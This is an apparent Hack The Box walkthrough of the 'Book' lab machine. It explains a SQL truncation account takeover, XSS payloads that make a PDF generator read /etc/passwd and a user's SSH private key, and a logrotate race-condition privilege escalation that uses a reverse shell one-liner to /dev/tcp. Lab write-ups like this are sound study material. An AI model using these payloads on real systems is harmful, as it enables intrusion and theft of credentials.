BOOK-HTB-WALKTHROUGH

Synopsis

Book is a medium level Linux Box. The box includes a SQL truncation vulnerability that helps us to change the admin password and access the admin portal. Then LFI via XXS leads us to read the private ssh key of the user. Finally, privilege escalation through logrotate.

Tools/Script used:

1. nmap: https://nmap.org/download.html
2. Burpsuite: https://portswigger.net/burp/communitydownload
3. logrotate: https://github.com/whotwagner/logrotten

1. Portscan

    nmap -sC -sV -oA ports 10.10.10.176

2 USER

2.1 SQL Truncation Attack

On the web, there is a sign in and sign up portal. After logging in with my specified credentials. I found the email address of admin and some directories through gobuster.

Gobuster output:
gobuster dir -u http://10.10.10.176/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x php,txt,html -o gobuster_result

Then I tried creating an account with the admin's email but, it throws an error "user exists". On analyzing the source code, I found the length of the email should not be more than 20 characters.

Taking hints from the HTB forum, I came across SQL Truncation vulnerability.
What I did here, I created a new account with email-"admin@book.htb      a". Here "a" is the 21st character. Now, what will happen the application checks whether the email "admin@book.htb      a" exists in DB or not. and it can't find it. So the application takes it as new email and, due to 20 chars limit, it rejects "a" and truncates the email.

Now we can change the admin password and can take access to the administrator portal.

login portal for admin: http://book.htb/admin

2.2 LFI via XSS

Normal users can upload files and the uploaded files can be downloaded from the admin portal.

Here the pdf is dynamically created, so I tried to perform XSS attack to read the local file on the "book title" field.
Payload:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText.small())};x.open("GET","file:///etc/passwd");x.send();</script>

PDF Generated:

Now we know the user is "reader". So, let's try to read his private ssh key.

Payload:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText.small())};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

PDF Generated:

  2.3 User Flag

• chmod 600 id_rsa
• ssh -i id_rsa reader@10.10.10.167

2 ROOT

There are log files under backup dir on the home of user "reader".

Then with pspy64, I found LogRotate is running as root. logrotate is a tool for managing log files created by system processes.

logrotate is also prone to a race condition where log dir (backup) is in control of the low-priv user(reader).

exploit: https://github.com/whotwagner/logrotten

payload:

• echo “bash -i >& /dev/tcp/10.0.0.1/8080 0>&1” > payloadfile
• chmod +x payloadfile

References:

1. SQL Truncation Attack: https://resources.infosecinstitute.com/sql-truncation-attack/

2. LFI via XSS: https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html

3.Logrotate: https://github.com/whotwagner/logrotten

Thank you for reading.